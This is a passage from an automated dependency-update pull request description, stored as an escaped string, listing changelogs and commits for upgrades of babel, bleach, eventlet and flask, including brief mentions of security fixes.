href=\"https://redirect.github.com/python-babel/babel/issues/726\"\u003e#726\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eDates: Correct default Format().timedelta format to 'long' to mute deprecation warnings – Aarni Koskela\u003c/li\u003e\n\u003cli\u003eImport: Simplify iteration code in \u0026quot;import_cldr.py\u0026quot; – Felix Schwarz\u003c/li\u003e\n\u003cli\u003eImport: Stop using deprecated ElementTree methods \u0026quot;getchildren()\u0026quot; and \u0026quot;getiterator()\u0026quot; – Felix Schwarz\u003c/li\u003e\n\u003cli\u003eMessages: Fix unicode printing error on Python 2 without TTY. – Niklas Hambüchen\u003c/li\u003e\n\u003cli\u003eMessages: Introduce invariant that _invalid_pofile() takes unicode line. – Niklas Hambüchen\u003c/li\u003e\n\u003cli\u003eTests: fix tests when using Python 3.9 – Felix Schwarz\u003c/li\u003e\n\u003cli\u003eTests: Remove deprecated 'sudo: false' from Travis configuration – Jon Dufresne\u003c/li\u003e\n\u003cli\u003eTests: Support Py.test 6.x – Aarni Koskela\u003c/li\u003e\n\u003cli\u003eUtilities: LazyProxy: Handle AttributeError in specified func – Nikiforov Konstantin (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/724\"\u003e#724\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUtilities: Replace usage of parser.suite with ast.parse – Miro Hrončok\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eDocumentation\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate parse_number comments – Brad Martin (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/708\"\u003e#708\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd \u003cstrong\u003eiter\u003c/strong\u003e to Catalog documentation – \u003ca href=\"https://github.com/CyanNani123\"\u003e\u003ccode\u003e@​CyanNani123\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 2.8.1\u003c/h2\u003e\n\u003cp\u003eThis patch version only differs from 2.8.0 in that it backports in \u003ca href=\"https://redirect.github.com/python-babel/babel/issues/752\"\u003e#752\u003c/a\u003e.\u003c/p\u003e\n\u003ch2\u003eVersion 2.8.0\u003c/h2\u003e\n\u003ch1\u003eImprovements\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eCLDR: Upgrade to CLDR 36.0 - Aarni Koskela (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/679\"\u003e#679\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMessages: Don't even open files with the \u0026quot;ignore\u0026quot; extraction method - \u003ca href=\"https://github.com/sebleblanc\"\u003e\u003ccode\u003e@​sebleblanc\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eNumbers: Fix formatting very small decimals when quantization is disabled - Lev Lybin, \u003ca href=\"https://github.com/miluChen\"\u003e\u003ccode\u003e@​miluChen\u003c/code\u003e\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/662\"\u003e#662\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMessages: Attempt to sort all messages – Mario Frasca (\u003ca href=\"https://redirect.github.com/python-babel/babel/issues/651\"\u003e#651\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/python-babel/babel/issues/606\"\u003e#606\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eDocs\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-babel/babel/blob/master/CHANGES.rst\"\u003ebabel's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 2.9.1\u003c/h2\u003e\n\u003cp\u003eBugfixes\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* The internal locale-data loading functions now validate the name of the locale file to be loaded and only\n  allow files within Babel's data directory.  Thank you to Chris Lyne of Tenable, Inc. for discovering the issue!\n\u003ch2\u003eVersion 2.9.0\u003c/h2\u003e\n\u003cp\u003eUpcoming version support changes\u003cbr /\u003e\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThis version, Babel 2.9, is the last version of Babel to support Python 2.7, Python 3.4, and Python 3.5.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eImprovements\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* CLDR: Use CLDR 37 – Aarni Koskela (:gh:`734`)\n* Dates: Handle ZoneInfo objects in get_timezone_location, get_timezone_name - Alessio Bogon (:gh:`741`)\n* Numbers: Add group_separator feature in number formatting - Abdullah Javed Nesar (:gh:`726`)\n\u003cp\u003eBugfixes\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Dates: Correct default Format().timedelta format to 'long' to mute deprecation warnings – Aarni Koskela\n* Import: Simplify iteration code in \u0026amp;quot;import_cldr.py\u0026amp;quot; – Felix Schwarz\n* Import: Stop using deprecated ElementTree methods \u0026amp;quot;getchildren()\u0026amp;quot; and \u0026amp;quot;getiterator()\u0026amp;quot; – Felix Schwarz\n* Messages: Fix unicode printing error on Python 2 without TTY. – Niklas Hambüchen\n* Messages: Introduce invariant that _invalid_pofile() takes unicode line. – Niklas Hambüchen\n* Tests: fix tests when using Python 3.9 – Felix Schwarz\n* Tests: Remove deprecated 'sudo: false' from Travis configuration – Jon Dufresne\n* Tests: Support Py.test 6.x – Aarni Koskela\n* Utilities: LazyProxy: Handle AttributeError in specified func – Nikiforov Konstantin (:gh:`724`)\n* Utilities: Replace usage of parser.suite with ast.parse – Miro Hrončok\n\nDocumentation\n\u0026lt;/code\u0026gt;\u0026lt;/pre\u0026gt;\n\u0026lt;ul\u0026gt;\n\u0026lt;li\u0026gt;Update parse_number comments – Brad Martin (:gh:\u0026lt;code\u0026gt;708\u0026lt;/code\u0026gt;)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;Add \u0026lt;strong\u0026gt;iter\u0026lt;/strong\u0026gt; to Catalog documentation – \u0026lt;a href=\u0026quot;https://github.com/CyanNani123\u0026quot;\u0026gt;\u0026lt;code\u0026gt;@​CyanNani123\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt;\u0026lt;/li\u0026gt;\n\u0026lt;/ul\u0026gt;\n\u0026lt;h2\u0026gt;Version 2.8.1\u0026lt;/h2\u0026gt;\n\u0026lt;p\u0026gt;This is solely a patch release to make running tests on Py.test 6+ possible.\u0026lt;/p\u0026gt;\n\u0026lt;p\u0026gt;Bugfixes\u0026lt;/p\u0026gt;\n\u0026lt;!-- raw HTML omitted --\u0026gt;\n\u0026lt;/blockquote\u0026gt;\n\u0026lt;p\u0026gt;... (truncated)\u0026lt;/p\u0026gt;\n\u0026lt;/details\u0026gt;\n\u0026lt;details\u0026gt;\n\u0026lt;summary\u0026gt;Commits\u0026lt;/summary\u0026gt;\n\n\u0026lt;ul\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/a99fa2474c808b51ebdabea18db871e389751559\u0026quot;\u0026gt;\u0026lt;code\u0026gt;a99fa24\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Use 2.9.0's setup.py for 2.9.1\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/60b33e083801109277cb068105251e76d0b7c14e\u0026quot;\u0026gt;\u0026lt;code\u0026gt;60b33e0\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Become 2.9.1\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/412015ef642bfcc0d8ba8f4d05cdbb6aac98d9b3\u0026quot;\u0026gt;\u0026lt;code\u0026gt;412015e\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Merge pull request \u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/782\u0026quot;\u0026gt;#782\u0026lt;/a\u0026gt; from python-babel/locale-basename\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/5caf717ceca4bd235552362b4fbff88983c75d8c\u0026quot;\u0026gt;\u0026lt;code\u0026gt;5caf717\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Disallow special filenames on Windows\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/3a700b5b8b53606fd98ef8294a56f9510f7290f8\u0026quot;\u0026gt;\u0026lt;code\u0026gt;3a700b5\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Run locale identifiers through \u0026lt;code\u0026gt;os.path.basename()\u0026lt;/code\u0026gt;\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/5afe2b2f11dcdd6090c00231d342c2e9cd1bdaab\u0026quot;\u0026gt;\u0026lt;code\u0026gt;5afe2b2\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Merge pull request \u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/754\u0026quot;\u0026gt;#754\u0026lt;/a\u0026gt; from python-babel/github-ci\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/58de8342f865df88697a4a166191e880e3c84d82\u0026quot;\u0026gt;\u0026lt;code\u0026gt;58de834\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Replace Travis + Appveyor with GitHub Actions (WIP)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/d1bbc08e845d03d8e1f0dfa0e04983d755f39cb5\u0026quot;\u0026gt;\u0026lt;code\u0026gt;d1bbc08\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; import_cldr: use logging; add -q option\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/156b7fb9f377ccf58c71cf01dc69fb10c7b69314\u0026quot;\u0026gt;\u0026lt;code\u0026gt;156b7fb\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Quiesce CLDR download progress bar if requested (or not a TTY)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/613dc1700f91c3d40b081948c0dd6023d8ece057\u0026quot;\u0026gt;\u0026lt;code\u0026gt;613dc17\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Make the import warnings about unsupported number systems less verbose\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;Additional commits viewable in \u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/compare/v2.5.3...v2.9.1\u0026quot;\u0026gt;compare view\u0026lt;/a\u0026gt;\u0026lt;/li\u0026gt;\n\u0026lt;/ul\u0026gt;\n\u0026lt;/details\u0026gt;\n\n\u0026lt;br /\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\n\nUpdates `bleach` from 2.1.3 to 3.3.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/mozilla/bleach/blob/main/CHANGES\"\u003ebleach's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 3.3.0 (February 1st, 2021)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBackwards incompatible changes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eclean escapes HTML comments even when strip_comments=False\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix bug 1621692 / GHSA-m6xf-fq7q-8743. See the advisory for details.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFeatures\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eBug fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003ch2\u003eVersion 3.2.3 (January 26th, 2021)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFeatures\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eBug fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003efix clean and linkify raising ValueErrors for certain inputs. Thank you \u003ca href=\"https://github.com/Google-Autofuzz\"\u003e\u003ccode\u003e@​Google-Autofuzz\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 3.2.2 (January 20th, 2021)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFeatures\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate CI to Github Actions. Thank you \u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eBug fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003efix linkify raising an IndexError on certain inputs. Thank you \u003ca href=\"https://github.com/Google-Autofuzz\"\u003e\u003ccode\u003e@​Google-Autofuzz\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/79b7a3c5e56a09d1d323a5006afa59b56162eb13\"\u003e\u003ccode\u003e79b7a3c\u003c/code\u003e\u003c/a\u003e Merge pull request from GHSA-vv2x-vrpj-qqpq\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/842fcb4a05e59d9a22dafb8c51865ee79d753c03\"\u003e\u003ccode\u003e842fcb4\u003c/code\u003e\u003c/a\u003e Update for v3.3.0 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/1334134d34397966a7f7cfebd38639e9ba2c680e\"\u003e\u003ccode\u003e1334134\u003c/code\u003e\u003c/a\u003e sanitizer: escape HTML comments\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/c045a8b2a02bfb77bb9cacd5d3e5926c056074d2\"\u003e\u003ccode\u003ec045a8b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/581\"\u003e#581\u003c/a\u003e from mozilla/nit-fixes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/491abb06ce89012d852f4c5ab3aff8f572532611\"\u003e\u003ccode\u003e491abb0\u003c/code\u003e\u003c/a\u003e fix typo s/vnedoring/vendoring/\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/10b1c5dda8ebceffce1d8f7d66d4b309b4f8c0cf\"\u003e\u003ccode\u003e10b1c5d\u003c/code\u003e\u003c/a\u003e vendor: add html5lib-1.1.dist-info/REQUESTED\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/cd838c3b527021f2780d77718488fa03d81f08e3\"\u003e\u003ccode\u003ecd838c3\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/579\"\u003e#579\u003c/a\u003e from mozilla/validate-convert-entity-code-points\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/612b8080ada0fba45f0575bfcd4f3a0bda7bfaca\"\u003e\u003ccode\u003e612b808\u003c/code\u003e\u003c/a\u003e Update for v3.2.3 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/6879f6a67058c0d5977a8aa580b6338c9d34ff0e\"\u003e\u003ccode\u003e6879f6a\u003c/code\u003e\u003c/a\u003e html5lib_shim: validate unicode points for convert_entity\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/90cb80be961aaf650ebc65b2ba2b789a2e9b129f\"\u003e\u003ccode\u003e90cb80b\u003c/code\u003e\u003c/a\u003e Update for v3.2.2 release\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/mozilla/bleach/compare/v2.1.3...v3.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `eventlet` from 0.23.0 to 0.35.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/eventlet/eventlet/blob/master/NEWS\"\u003eeventlet's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e0.35.2\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e[fix] Fix tool.setuptools/packages list \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/921\"\u003eeventlet/eventlet#921\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[security] Dnspython 2.6.1 - Address DoS via the Tudoor mechanism (CVE-2023-29483) \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/916\"\u003eeventlet/eventlet#916\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[doc] add asyncio into the doc hub page \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/918\"\u003eeventlet/eventlet#918\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[clean] clean obsolete python 2 code from the ssl module \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/915\"\u003eeventlet/eventlet#915\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[fix] Add get_server_info to db_pool.py \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/324\"\u003eeventlet/eventlet#324\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[fix] wsgi: Handle Timeouts from applications \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/911\"\u003eeventlet/eventlet#911\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[fix] shrinks window before connecting \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/905\"\u003eeventlet/eventlet#905\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e0.35.1\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e[fix] Do not allow failed patching to stop execution \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/907\"\u003eeventlet/eventlet#907\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e0.35.0\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e[doc] Basic documentation for asyncio migration \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/892\"\u003eeventlet/eventlet#892\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[tests] add minimal linting \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/894\"\u003eeventlet/eventlet#894\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[doc] officially host docs on readthedocs \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/899\"\u003eeventlet/eventlet#899\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[fix] fix truncate size nullable \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/789\"\u003eeventlet/eventlet#789\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[fix] Handle transport endpoint shutdown in conditions \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/884\"\u003eeventlet/eventlet#884\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[fix] Rework reject_bad_requests option \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/890\"\u003eeventlet/eventlet#890\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[fix] Fix NameError introduced by \u003ca href=\"https://redirect.github.com/eventlet/eventlet/issues/826\"\u003e#826\u003c/a\u003e \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/890\"\u003eeventlet/eventlet#890\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feature] Support awaiting GreenThread in an \u003ccode\u003easync def\u003c/code\u003e context \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/889\"\u003eeventlet/eventlet#889\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[infra] Extend test cert to 2049 \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/643\"\u003eeventlet/eventlet#643\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feature] Asyncio hub support for Python 3.7 to 3.9 \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/886\"\u003eeventlet/eventlet#886\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[infra] Modernize doc generation \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/880\"\u003eeventlet/eventlet#880\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[fix] Fix bad exceptions handlings \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/883\"\u003eeventlet/eventlet#883\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feature] Support using asyncio coroutines from inside greenlets \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/877\"\u003eeventlet/eventlet#877\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[removal] Remove deprecated CGIHTTPServer and SimpleHTTPServer \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/881\"\u003eeventlet/eventlet#881\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[governance] Update maintenance goals \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/850\"\u003eeventlet/eventlet#850\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[feature] Add an asyncio hub for eventlet \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/870\"\u003eeventlet/eventlet#870\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e0.34.3\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix security issue in the wsgi module related to RFC 9112 \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/826\"\u003eeventlet/eventlet#826\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix segfault, a new approach for greening existing locks \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/866\"\u003eeventlet/eventlet#866\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003egreendns: fix getaddrinfo parameter name \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/809\"\u003eeventlet/eventlet#809\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix deprecation warning on ssl.PROTOCOL_TLS \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/872\"\u003eeventlet/eventlet#872\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePytests, fix error at teardown of TestGreenSocket.test_full_duplex \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/871\"\u003eeventlet/eventlet#871\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSkip test which uses Py cgi module \u003ca href=\"https://redirect.github.com/eventlet/eventlet/pull/865\"\u003eeventlet/eventlet#865\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDrop old code based on python \u0026lt; 3.7\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e0.34.2\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eventlet/eventlet/commit/edd9e7e31e93161983a154430120d9ea125f3fd0\"\u003e\u003ccode\u003eedd9e7e\u003c/code\u003e\u003c/a\u003e Update changelog for version 0.35.2 (\u003ca href=\"https://redirect.github.com/eventlet/eventlet/issues/920\"\u003e#920\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eventlet/eventlet/commit/a23fd0e196638ec83d6c5d1d62b3de4c454a75f9\"\u003e\u003ccode\u003ea23fd0e\u003c/code\u003e\u003c/a\u003e Fix tool.setuptools/packages list (\u003ca href=\"https://redirect.github.com/eventlet/eventlet/issues/921\"\u003e#921\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eventlet/eventlet/commit/51e3c4928d4938beb576eff34f3bf97e6e64e6b4\"\u003e\u003ccode\u003e51e3c49\u003c/code\u003e\u003c/a\u003e Dnspython 2.6.1 - Address DoS via the Tudoor mechanism (CVE-2023-29483)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eventlet/eventlet/commit/b6f6e7c3a81853c2bf380f48bc0da7b894a3a903\"\u003e\u003ccode\u003eb6f6e7c\u003c/code\u003e\u003c/a\u003e add asyncio into the doc hub page (\u003ca href=\"https://redirect.github.com/eventlet/eventlet/issues/918\"\u003e#918\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eventlet/eventlet/commit/96a39405105c869b598662ac2748591f27eae81b\"\u003e\u003ccode\u003e96a3940\u003c/code\u003e\u003c/a\u003e clean obsolete python 2 code from the ssl module (\u003ca href=\"https://redirect.github.com/eventlet/eventlet/issues/915\"\u003e#915\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eventlet/eventlet/commit/06ec6307d7679c691fc161992f4b4304c5e32aeb\"\u003e\u003ccode\u003e06ec630\u003c/code\u003e\u003c/a\u003e Add get_server_info to db_pool.py (\u003ca href=\"https://redirect.github.com/eventlet/eventlet/issues/324\"\u003e#324\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eventlet/eventlet/commit/dfcc93953d761f7e13c04800d4d3b35257d4b840\"\u003e\u003ccode\u003edfcc939\u003c/code\u003e\u003c/a\u003e wsgi: Handle Timeouts from applications (\u003ca href=\"https://redirect.github.com/eventlet/eventlet/issues/911\"\u003e#911\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eventlet/eventlet/commit/799dabcb3fffb81a15f1b9fb1930e4e28edd4a12\"\u003e\u003ccode\u003e799dabc\u003c/code\u003e\u003c/a\u003e [Fix] shrinks window before connecting (\u003ca href=\"https://redirect.github.com/eventlet/eventlet/issues/905\"\u003e#905\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eventlet/eventlet/commit/3f8c9e4ede97e0bd57d8b1ab4aa56e51bf35582c\"\u003e\u003ccode\u003e3f8c9e4\u003c/code\u003e\u003c/a\u003e Do not allow failed patching to stop execution (\u003ca href=\"https://redirect.github.com/eventlet/eventlet/issues/907\"\u003e#907\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/eventlet/eventlet/commit/d467343102b0a24c19feff62321137162e924751\"\u003e\u003ccode\u003ed467343\u003c/code\u003e\u003c/a\u003e Add Python 3.7 to pyproject classifiers (\u003ca href=\"https://redirect.github.com/eventlet/eventlet/issues/904\"\u003e#904\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/eventlet/eventlet/compare/v0.23.0...v0.35.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `flask` from 1.0.2 to 2.2.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/flask/releases\"\u003eflask's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.2.5\u003c/h2\u003e\n\u003cp\u003eThis is a security fix release for the 2.2.x release branch. Note that 2.3.x is the currently supported release branch; please upgrade to the latest version if possible.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity advisory: \u003ca 